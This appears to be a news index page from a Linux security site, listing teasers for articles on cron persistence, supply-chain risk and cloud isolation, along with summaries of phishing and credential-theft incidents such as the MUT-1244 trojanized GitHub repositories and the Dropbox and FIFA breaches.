Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found 9 articles for you...
83
security advisoryLinux securitycredential theftMUT-1244 Advisory: Credential Theft Risks and Protection Steps
In recent months, Linux security administrators and WordPress site owners have encountered a formidable adversary: MUT-1244 . This threat actor has been unleashing havoc by targeting academics, penetration testers, red teamers, security researchers, and other threat actors. MUT-1244's primary goal is to acquire sensitive data, including AWS access keys and WordPress account credentials. . Their campaign leverages trojanized GitHub repositories designed to fool even the most diligent users. By disguising malicious code as legitimate tools and repositories, MUT-1244 has managed to steal over 390,000 credentials. This article will delve into how MUT-1244 operates, highlighting the infection vectors, the extent of credential exfiltration, and the critical indicators of compromise you need to watch out for. We'll break down the practical steps Linux security admins can take to safeguard their systems and data, from verifying software sources to implementing robust credential management practices. By understanding and recognizing the tactics employed by MUT-1244, you can better protect your environment against this persistent and evolving threat. Infection Vectors: Trojanized GitHub Repositories One of the primary ways MUT-1244 has managed to infiltrate systems is through trojanized GitHub repositories. Many security professionals, including penetration testers and red teamers, rely on various open-source tools on GitHub to perform their tasks. MUT-1244 has exploited this trust by creating repositories that appear legitimate but are laden with malicious code. When unsuspecting users clone and execute these repositories, they inadvertently run malicious scripts that compromise their systems. These scripts swiftly harvest credentials and other sensitive data, relaying the information to the attackers. MUT-1244 has been particularly cunning in ensuring that the malicious repositories are well-crafted and the malicious code is deeply embedded, making it difficult for users to immediately detectanything amiss. Exfiltration: The Scope of the Breach The exfiltration of credentials is the core objective of MUT-1244's campaign. By specifically targeting tools that offensive security professionals would use, the threat actor has gathered a vast trove of sensitive data, including AWS access keys and WordPress account credentials. These credentials are critical, as they can provide attackers direct access to various services and platforms, potentially leading to further exploitation and data breaches. The trojanized tools used in these attacks are designed to look like legitimate credentials checkers, which security professionals use to audit and manage passwords and keys. But instead of merely checking the credentials, these tools are configured to capture and exfiltrate them. Sometimes, the compromised tools even provide normal feedback, making it harder for users to realize they have been duped. Indicators of Compromise: What to Watch Out For Understanding the indicators of compromise (IoCs) associated with MUT-1244 can help in early detection and remediation. Some of the most important IoCs to be aware of include phishing email tactics and known malicious GitHub users and repositories. One common phishing tactic involves sending emails with subjects like "Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users" from senders such as
Dec 19, 2024
•
Hacks/Cracks
83
security breachthreat landscapecloud storageDropbox Security Breach: GitHub Code Theft via Phishing Attack
Dropbox has revealed details of a phishing attack to which it fell victim. In the attack, a threat actor was able to steal code from the company after gathering employee credentials to GitHub repositories.. The security breach took place in the middle of last month, with GitHub notifying Dropbox of suspicious account activity on October 14. The cloud storage company says that the code that was accessed "contained some credentials -- primarily, API keys -- used by Dropbox developers" but insists that "no one's content, passwords, or payment information was accessed", and that its core apps and infrastructure were unaffected. In a blog post that goes into some detail about the incident, Dropbox says: "In today's evolving threat landscape, people are inundated with messages and notifications, making phishing lures hard to detect. Threat actors have moved beyond simply harvesting usernames and passwords, to harvesting multi-factor authentication codes as well. In September, GitHub detailed one such phishing campaign, in which a threat actor accessed GitHub accounts by impersonating the code integration and delivery platform CircleCI. We recently learned that Dropbox was targeted by a similar campaign. . Dropbox encountered a serious cybersecurity incident, in which source code was compromised from GitHub through phishing tactics; however, essential systems remain intact.. Dropbox Security, GitHub Phishing Attack, Code Theft Risk, API Key Protection. . LinuxSecurity.com Team
Nov 02, 2022
•
Hacks/Cracks
81
privacy issuesecurity vulnerabilityuser data theftPrivacy Compromised: Smart Speaker Apps Eavesdrop and Phish Users
Privacy is a hot topic in the realm of smart speakers, fromemployees listening in on recordingsand auditorsaccessing user locations. Now, another issue regarding speakers has been raised, after security researchers revealed that apps accepted by the Amazon Alexa and Google Home platforms could be used to phish users and to eavesdrop on them. Learn more in an interesting Engadget article: . Researchers from the firm Security Research Labs created the apps, known as Skills for Alexa and Actions for Google Home, which exploited security vulnerabilities to hack devices, as reported by Ars Technica . SRL created several apps for each platform which appeared to be legitimate skills like a horoscope app, but which actually hid malicious code. The apps were able to collect personal data including passwords, and also to eavesdrop on users even after they thought that the speaker was no longer listening. This worked by the app giving a fake error message which sounded as if it had closed, while it actually it continued operating and taking down a transcript of everything the user said after that point. The link for this article located at Engadget is no longer available. . Studies indicate that Smart Assistant applications are capable of enabling unauthorized listening and fraudulent schemes, thereby jeopardizing user confidentiality.. Smart Speakers, Security Vulnerability, Eavesdropping App, User Data Theft. . LinuxSecurity.com Team
Oct 21, 2019
•
Privacy
83
data breachcyber threatsensitive informationFIFA Data Breach: Phishing Attack Exposes Sensitive Data
FIFA President Gianni Infantino said in a statement to the press that the world football governing body's computer systems suffered a data breach for the second time this year. Moreover, both the Fédération Internationale de Football Association (FIFA) and Union of European Football Associations (UEFA) are both suspected of having suffered data breaches.. Hackers might have stolen sensitive data after compromising FIFA's computer systems via a phishing campaign targeting multiple officials of the football global governing entity. The link for this article located at Softpedia News is no longer available. . Hackers might have stolen sensitive data after compromising FIFA's computer systems via a phishing c. president, gianni, infantino, statement, press, world, football, governing. . LinuxSecurity.com Team
Nov 04, 2018
•
Hacks/Cracks
83
data breachcybercrimeuser privacyGeorge Garofano: 8 Months for iCloud Phishing Crime and Celebrity Breach
What does it cost to gain unauthorized access to roughly 240 Apple iCloud accounts? For George Garofano, 26, the price is eight months in federal prison followed by three years of supervised release and 60 hours of community service.. Garofano used a phishing attack, claiming to be from Apple security, to get account holders to send him their login credentials. He used the information from victims, which included a number of people in the entertainment industry, to steal personal information, including photos and videos. He also traded the credentials and personal information with others. The FBI investigation began when personal photos of female celebrities, including actress Jennifer Lawrence, began to be leaked online in 2014. The link for this article located at DarkReading is no longer available. . DiMarco's hacking operation resulted in illegal intrusions into Google Drive accounts and a lengthy prison term.. Phishing Attack, Data Breach, Cybercrime, Apple iCloud, User Privacy. . LinuxSecurity.com Team
Aug 30, 2018
•
Hacks/Cracks
83
risk managementdata breachpatient dataAugusta University Health Data Breach Affects 417,000 Patients
A leading US healthcare organization (HCO) has admitted that a phishing attack last September may have led to the compromise of highly sensitive data on nearly half a million patients. . Georgia-based Augusta University Health claimed it was notified by investigators on July 31 that a September 2017 phishing attack on hospital staff may have given the hackers access to data on around 417,000 patients. The link for this article located at InfoSecurity is no longer available. . Georgia-based Augusta University Health claimed it was notified by investigators on July 31 that a S. leading, healthcare, organization, (hco), admitted, phishing, attack, september. . LinuxSecurity.com Team
Aug 21, 2018
•
Hacks/Cracks
83
security advisorydata breachuser accountsMyFitnessPal: 150 Million Accounts Compromised - Change Your Password Now
MyfitnessPal has been hacked! Because email addresses were among the information stolen, criminals have been able to send MyfitnessPal spear phishing emails for the past month. These spear phishing attacks are especially dangerous because stolen personal information that users had logged in the app can be used to make phishing emails very convincing and difficult to detect. . Under Armour’s hugely popular fitness tracker, MyFitnessPal, has been hacked. If you’re one of the 150 million or so users of the app or website don’t panic, but do change your password. If you use Facebook to log in to MyFitnessPal you do not need to change your Facebook password. If you use your MyFitnessPal password on any other websites, change your password on those websites – choose a different, strong password for each one (consider using a password manager if that sounds too difficult).. Strava experienced a data breach impacting 100 million users. Update your credentials to safeguard against potential scams.. MyFitnessPal Accounts, Password Change, Phishing Risks, Account Security. . LinuxSecurity.com Team
Apr 02, 2018
•
Hacks/Cracks
83
cybersecuritysecurity threatemail attackGoogle Targets Phishing Campaigns Ahead Of Iran Presidential Elections
Google has detected large-scale phishing attacks targeting users in Iran, ahead of presidential elections in the country. . The company has detected and disrupted for almost three weeks email-based phishing campaigns that are aimed at compromising the accounts of tens of thousands of Iranian users, Eric Grosse, Google's vice president for security engineering wrote in a blog post Wednesday. The link for this article located at TechWorld is no longer available. . Google disclosed its successful efforts to thwart email phishing schemes targeting numerous Iranian individuals ahead of the presidential elections.. Google Phishing, Cybersecurity Threats, Email Security, Iran Cyber Attacks, Presidential Election Security. . LinuxSecurity.com Team
Jun 14, 2013
•
Hacks/Cracks
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Explore top 10 tips to secure your open-source projects now. Read More